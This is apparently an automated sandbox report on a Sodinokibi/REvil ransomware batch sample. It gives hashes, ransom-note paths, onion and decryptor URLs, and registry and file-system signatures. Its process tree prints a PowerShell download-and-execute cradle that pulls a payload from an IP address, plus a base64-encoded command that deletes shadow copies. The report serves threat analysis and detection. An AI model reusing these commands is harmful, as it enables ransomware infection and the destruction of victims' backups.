Analysis
-
max time kernel
140s -
max time network
56s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-06-2020 02:10
Static task
static1
Behavioral task
behavioral1
Sample
ef447ab5d2ae0a9d701c838651e09c94.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
ef447ab5d2ae0a9d701c838651e09c94.bat
Resource
win10v200430
General
-
Target
ef447ab5d2ae0a9d701c838651e09c94.bat
-
Size
222B
-
MD5
c5368e48c478684dfe98d32e80ae5937
-
SHA1
306390ba49636df25818c32788ed3fe603394007
-
SHA256
80a177482b2efdaad3bf92dd550933e4a859bfc987e2511c301838d687fdfe86
-
SHA512
080141c425524360ce79c56e3de9f7196c4527001ed7c763056876ef2c5dd078a9751f7e3a87a0914928327b218428870e07f979d1c26a29390112142df55fbe
Malware Config
Extracted
http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94
Extracted
C:\ak80t6qf0w-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/25BA0DA33B40EBC0
http://decryptor.cc/25BA0DA33B40EBC0
Signatures
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeBackupPrivilege 332 vssvc.exe Token: SeRestorePrivilege 332 vssvc.exe Token: SeAuditPrivilege 332 vssvc.exe Token: SeTakeOwnershipPrivilege 868 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 868 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a0638w7.bmp" powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\ak80t6qf0w-readme.txt powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files (x86)\ak80t6qf0w-readme.txt powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ak80t6qf0w-readme.txt powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ak80t6qf0w-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ak80t6qf0w-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1520 wrote to memory of 868 1520 cmd.exe powershell.exe PID 868 wrote to memory of 1792 868 powershell.exe powershell.exe PID 868 wrote to memory of 1792 868 powershell.exe powershell.exe PID 868 wrote to memory of 1792 868 powershell.exe powershell.exe PID 868 wrote to memory of 1792 868 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 1792 powershell.exe 1792 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ef447ab5d2ae0a9d701c838651e09c94.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94');Invoke-NAGUEMUGEPDJGKM;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:332